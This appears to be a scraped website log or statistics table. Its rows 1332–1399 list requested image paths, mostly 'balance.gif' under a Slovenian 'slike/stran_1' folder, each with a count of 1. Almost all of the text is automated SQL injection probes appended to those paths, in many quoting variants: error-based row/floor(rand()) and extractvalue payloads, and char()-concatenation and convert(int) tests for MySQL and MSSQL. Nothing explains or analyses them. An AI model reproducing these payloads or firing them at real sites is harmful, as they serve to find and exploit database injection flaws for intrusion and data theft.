1332. | 1 | balance.gif) or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and (4476=4476 //slike//stran_1/balance.gif) or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and (4476=4476 |
1333. | 1 | balance.gif)) or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and ((3356=3356 //slike//stran_1/balance.gif)) or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and ((3356=3356 |
1334. | 1 | balance.gif or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) //slike//stran_1/balance.gif or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) |
1335. | 1 | balance.gif') or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and ('bgdl'='bgdl //slike//stran_1/balance.gif') or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and ('bgdl'='bgdl |
1336. | 1 | balance.gif')) or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and (('vmlo'='vmlo //slike//stran_1/balance.gif')) or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and (('vmlo'='vmlo |
1337. | 1 | balance.gif' or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and 'imow'='imow //slike//stran_1/balance.gif' or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and 'imow'='imow |
1338. | 1 | balance.gif') or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and ('kmhj' like 'kmhj //slike//stran_1/balance.gif') or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and ('kmhj' like 'kmhj |
1339. | 1 | balance.gif%' or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and 'hwpi%'='hwpi //slike//stran_1/balance.gif%' or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and 'hwpi%'='hwpi |
1340. | 1 | balance.gif' or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and 'rqdi' like 'rqdi //slike//stran_1/balance.gif' or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and 'rqdi' like 'rqdi |
1341. | 1 | (select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and ("rvrt"="rvrt','','scrollbars=1,resizable=1');">balance.gif") or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and ("rvrt"="rvrt //slike//stran_1/balance.gif") or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and ("rvrt"="rvrt |
1342. | 1 | (select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and "uidh"="uidh','','scrollbars=1,resizable=1');">balance.gif" or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and "uidh"="uidh //slike//stran_1/balance.gif" or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x) and "uidh"="uidh |
1343. | 1 | balance.gif or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x)-- nurb //slike//stran_1/balance.gif or row(9190,9579)>(select count(*),concat(0x7171707671,(select (elt(9190=9190,1))),0x7170767871,floor(rand(0)*2))x from (select 2340 union select 3234 union select 1605 union select 6193)a group by x)-- nurb |
1344. | 1 | balance.gif) and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (5533=5533 //slike//stran_1/balance.gif) and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (5533=5533 |
1345. | 1 | balance.gif)) and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ((8110=8110 //slike//stran_1/balance.gif)) and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ((8110=8110 |
1346. | 1 | balance.gif and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) //slike//stran_1/balance.gif and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) |
1347. | 1 | balance.gif') and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('btuu'='btuu //slike//stran_1/balance.gif') and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('btuu'='btuu |
1348. | 1 | balance.gif')) and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (('jrvp'='jrvp //slike//stran_1/balance.gif')) and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (('jrvp'='jrvp |
1349. | 1 | balance.gif' and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'rbim'='rbim //slike//stran_1/balance.gif' and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'rbim'='rbim |
1350. | 1 | balance.gif') and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('bqzs' like 'bqzs //slike//stran_1/balance.gif') and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('bqzs' like 'bqzs |
1351. | 1 | balance.gif%' and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'rqlm%'='rqlm //slike//stran_1/balance.gif%' and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'rqlm%'='rqlm |
1352. | 1 | balance.gif' and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'pmpy' like 'pmpy //slike//stran_1/balance.gif' and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'pmpy' like 'pmpy |
1353. | 1 | balance.gif") and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ("bhaz"="bhaz //slike//stran_1/balance.gif") and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ("bhaz"="bhaz |
1354. | 1 | balance.gif" and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and "dcof"="dcof //slike//stran_1/balance.gif" and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and "dcof"="dcof |
1355. | 1 | balance.gif and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113)))-- braq //slike//stran_1/balance.gif and 6078 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (6078=6078) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113)))-- braq |
1356. | 1 | -2495) or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (8967=8967 //slike//stran_1/-2495) or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (8967=8967 |
1357. | 1 | -6873)) or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ((2543=2543 //slike//stran_1/-6873)) or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ((2543=2543 |
1358. | 1 | -2809 or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) //slike//stran_1/-2809 or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) |
1359. | 1 | -9511') or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('crcs'='crcs //slike//stran_1/-9511') or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('crcs'='crcs |
1360. | 1 | -5198')) or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (('oadh'='oadh //slike//stran_1/-5198')) or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (('oadh'='oadh |
1361. | 1 | -6036' or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'sfhk'='sfhk //slike//stran_1/-6036' or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'sfhk'='sfhk |
1362. | 1 | -4544') or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('mepe' like 'mepe //slike//stran_1/-4544') or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('mepe' like 'mepe |
1363. | 1 | -9609%' or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'kzim%'='kzim //slike//stran_1/-9609%' or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'kzim%'='kzim |
1364. | 1 | -2658' or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'upvj' like 'upvj //slike//stran_1/-2658' or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'upvj' like 'upvj |
1365. | 1 | -5116") or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ("xeyn"="xeyn //slike//stran_1/-5116") or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ("xeyn"="xeyn |
1366. | 1 | -2302" or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and "cnxh"="cnxh //slike//stran_1/-2302" or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and "cnxh"="cnxh |
1367. | 1 | -9510 or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113)))-- tjrv //slike//stran_1/-9510 or 8095 in (select (char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (8095=8095) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113)))-- tjrv |
1368. | 1 | balance.gif) and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (1183=1183 //slike//stran_1/balance.gif) and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (1183=1183 |
1369. | 1 | balance.gif)) and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ((2670=2670 //slike//stran_1/balance.gif)) and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ((2670=2670 |
1370. | 1 | balance.gif and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) //slike//stran_1/balance.gif and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) |
1371. | 1 | balance.gif') and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('kobx'='kobx //slike//stran_1/balance.gif') and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('kobx'='kobx |
1372. | 1 | balance.gif')) and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (('odvz'='odvz //slike//stran_1/balance.gif')) and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and (('odvz'='odvz |
1373. | 1 | balance.gif' and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'gwas'='gwas //slike//stran_1/balance.gif' and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'gwas'='gwas |
1374. | 1 | balance.gif') and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('bboj' like 'bboj //slike//stran_1/balance.gif') and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ('bboj' like 'bboj |
1375. | 1 | balance.gif%' and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'sacu%'='sacu //slike//stran_1/balance.gif%' and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'sacu%'='sacu |
1376. | 1 | balance.gif' and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'vquh' like 'vquh //slike//stran_1/balance.gif' and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and 'vquh' like 'vquh |
1377. | 1 | balance.gif") and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ("chmt"="chmt //slike//stran_1/balance.gif") and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and ("chmt"="chmt |
1378. | 1 | balance.gif" and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and "jtzl"="jtzl //slike//stran_1/balance.gif" and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113))) and "jtzl"="jtzl |
1379. | 1 | balance.gif and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113)))-- hxsr //slike//stran_1/balance.gif and 2214=convert(int,(select char(113)+char(113)+char(112)+char(118)+char(113)+(select (case when (2214=2214) then char(49) else char(48) end))+char(113)+char(112)+char(118)+char(120)+char(113)))-- hxsr |
1380. | 1 | balance.gif) and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and (1032=1032 //slike//stran_1/balance.gif) and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and (1032=1032 |
1381. | 1 | balance.gif)) and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and ((6673=6673 //slike//stran_1/balance.gif)) and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and ((6673=6673 |
1382. | 1 | balance.gif and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) //slike//stran_1/balance.gif and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) |
1383. | 1 | balance.gif') and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and ('qbig'='qbig //slike//stran_1/balance.gif') and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and ('qbig'='qbig |
1384. | 1 | balance.gif')) and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and (('axsf'='axsf //slike//stran_1/balance.gif')) and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and (('axsf'='axsf |
1385. | 1 | balance.gif' and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and 'wjwt'='wjwt //slike//stran_1/balance.gif' and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and 'wjwt'='wjwt |
1386. | 1 | balance.gif') and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and ('ugvr' like 'ugvr //slike//stran_1/balance.gif') and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and ('ugvr' like 'ugvr |
1387. | 1 | balance.gif%' and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and 'ggjd%'='ggjd //slike//stran_1/balance.gif%' and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and 'ggjd%'='ggjd |
1388. | 1 | balance.gif' and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and 'uwtu' like 'uwtu //slike//stran_1/balance.gif' and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and 'uwtu' like 'uwtu |
1389. | 1 | balance.gif") and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and ("jjvg"="jjvg //slike//stran_1/balance.gif") and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and ("jjvg"="jjvg |
1390. | 1 | balance.gif" and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and "rqeo"="rqeo //slike//stran_1/balance.gif" and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113)) and "rqeo"="rqeo |
1391. | 1 | balance.gif and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113))-- yzzw //slike//stran_1/balance.gif and 1116=concat(char(113)+char(113)+char(112)+char(118)+char(113),(select (case when (1116=1116) then char(49) else char(48) end)),char(113)+char(112)+char(118)+char(120)+char(113))-- yzzw |
1392. | 1 | balance.gif) procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and (8031=8031 //slike//stran_1/balance.gif) procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and (8031=8031 |
1393. | 1 | balance.gif)) procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and ((8311=8311 //slike//stran_1/balance.gif)) procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and ((8311=8311 |
1394. | 1 | balance.gif procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) //slike//stran_1/balance.gif procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) |
1395. | 1 | balance.gif') procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and ('hzeo'='hzeo //slike//stran_1/balance.gif') procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and ('hzeo'='hzeo |
1396. | 1 | balance.gif')) procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and (('mgsv'='mgsv //slike//stran_1/balance.gif')) procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and (('mgsv'='mgsv |
1397. | 1 | balance.gif' procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and 'rqkb'='rqkb //slike//stran_1/balance.gif' procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and 'rqkb'='rqkb |
1398. | 1 | balance.gif') procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and ('hzbt' like 'hzbt //slike//stran_1/balance.gif') procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and ('hzbt' like 'hzbt |
1399. | 1 | balance.gif%' procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and 'hnkt%'='hnkt //slike//stran_1/balance.gif%' procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and 'hnkt%'='hnkt |
